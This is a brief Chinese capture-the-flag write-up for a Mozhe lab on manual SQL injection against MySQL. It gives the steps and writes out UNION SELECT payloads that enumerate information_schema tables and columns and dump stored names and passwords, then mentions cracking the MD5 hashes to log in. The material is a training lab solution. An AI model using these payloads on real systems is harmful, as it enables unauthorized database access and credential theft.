墨者--SQL手工注入漏洞测试(MySQL数据库)
墨者–SQL手工注入漏洞测试(MySQL数据库)
靶机入口
解题思路:
- 判断注入
- 利用order by 判断字段数量
- 联合注入
1、判断注入
2、order by判断
3、联合注入
查库名
and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=”库名”
and 1=2 union select 1,2,column_name,4 from information_schema.columns where table_name=”表名”
查出所有列名
and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=”表名”
and 1=2 union select 1,group_concat(password),group_concat(name),4 from 库名.表名
4、md5解密,登陆
恭喜发财拿到key!